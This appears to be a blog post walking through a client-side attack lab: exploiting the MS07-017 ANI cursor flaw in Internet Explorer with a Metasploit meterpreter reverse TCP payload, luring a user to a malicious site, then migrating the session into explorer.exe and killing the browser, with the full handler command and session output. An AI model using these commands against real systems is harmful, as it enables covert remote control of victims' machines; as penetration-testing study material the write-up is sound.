I’ve been playing with the Metasploit framework and the *evil* meterpreter payload today (I would tell you why but I’m sure it would break a non-disclosure agreement or something :))
In particular I was studying client-side attacks and recreating the infamous MS07-17 (a classic!). While I was enjoying myself among hex code and debuggers, the way nerds do, I realized that the browser always hanged, thus forcing the user to kill the process and cutting down our meterpreter session. Not good. “Got root?” yes, but just for twenty seconds.
Looking for ways to improve the stability of the exploit, a colleague proposed a workaround, migrate the [meterpreter] server to another process. I totally forgot about the migrate command. This is how it can be done and the issues left unsolved.
I have just implemented the MS07-17 ANI vulnerability with the meterpreter reverse tcp payload, like this
I have “tricked” the user to visit my website and he inadvertently downloaded the evil cursor code that exploits the vuln in the GDI code. Oopppss! As a result, he has connected back to the machine, received the dll (it’s a staged payload) and injected it into the running process, iexplore.exe in this case.
We can indeed confirm that looking at the dll’s with Process Explorer, as in the follow capture:
After the migration of the meterpreter server to another process, less likely to be killed (for example explorer.exe), IE will crash but the process won’t die completely. Trying to attach a debugger to it will show us that the process window name is “MCI command handling window”. Although Process Explorer still shows the evil dll located at some point in the memory of this process, this address is not reachable using the debugger.
However, just to do things well it would be a good idea to kill the process (or what remains of it).
The whole process would be something like the following paste:
root@bt:/pentest/exploits/framework3# ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.8.31 EXITFUNC=seh E [*] Please wait while we load the module tree... [*] Started reverse handler on port 4444 [*] Starting the payload handler... [*] Sending stage (725504 bytes) [*] Meterpreter session 1 opened (192.168.8.31:4444 -> 192.168.9.34:1088) meterpreter > ps Process list ============ PID Name Arch User Path --- ---- ---- ---- ---- 0 [System Process] 4 System x86 580 smss.exe x86 NT AUTHORITYSYSTEM SystemRootSystem32smss.exe 652 csrss.exe x86 NT AUTHORITYSYSTEM ??C:WINDOWSsystem32csrss.exe 712 winlogon.exe x86 NT AUTHORITYSYSTEM ??C:WINDOWSsystem32winlogon.exe 756 services.exe x86 NT AUTHORITYSYSTEM C:WINDOWSsystem32services.exe [...]1860 ctfmon.exe x86 CLIENT034offsec C:WINDOWSsystem32ctfmon.exe 2004 svchost.exe x86 C:WINDOWSSystem32svchost.exe 1880 explorer.exe x86 CLIENT034offsec C:WINDOWSexplorer.exe 1920 iexplore.exe x86 CLIENT034offsec C:Program FilesInternet Exploreriexplore.exe meterpreter > migrate 1880 [*] Migrating to 1880... [*] Migration completed successfully. meterpreter > kill 1920 Killing: 1920 meterpreter > getpid Current pid: 1880 meterpreter >
As easy as “deceive, exploit, migrate and kill” :)Advertisements